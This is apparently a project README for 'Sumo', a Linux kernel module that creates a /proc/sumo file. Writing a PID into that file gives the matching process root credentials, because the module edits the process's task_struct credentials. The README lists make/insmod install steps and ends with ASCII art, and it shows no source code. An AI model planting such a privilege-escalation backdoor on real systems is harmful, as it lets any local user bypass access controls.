1.1 KiB
1.1 KiB
Sumo is a Linux Kernel module that grants root access credentials to any user-space process by PID.
TL;DR
.bashrc
make # build
sudo insmod sumo.ko # install
./whoami # test
How it works
In it's init() function, sumo kernel module creates /proc/sumo file and waits for PID to be written. Afterwards, it fetches instance of a task_struct kernel structure associated with the given PID and modifies its values accordingly. The main point of interest is the data stored in credentials structure.
sumo __ SUdo
,;.'--'. MOdule
/"/=,=(
\( __/
___/ (____
.' - - '.
/ v \
__/ , | \ '-/'_
{z, ,__/__,__/\__,_ )__( z}
\>' ( \_ `--c/
_.-'\_ , / \_
( `.______.' '.
\ , \ ( __ )
\ )-'-\__/-' | /
| | / .'
/ ,) ( \_
oooO' '--Ooo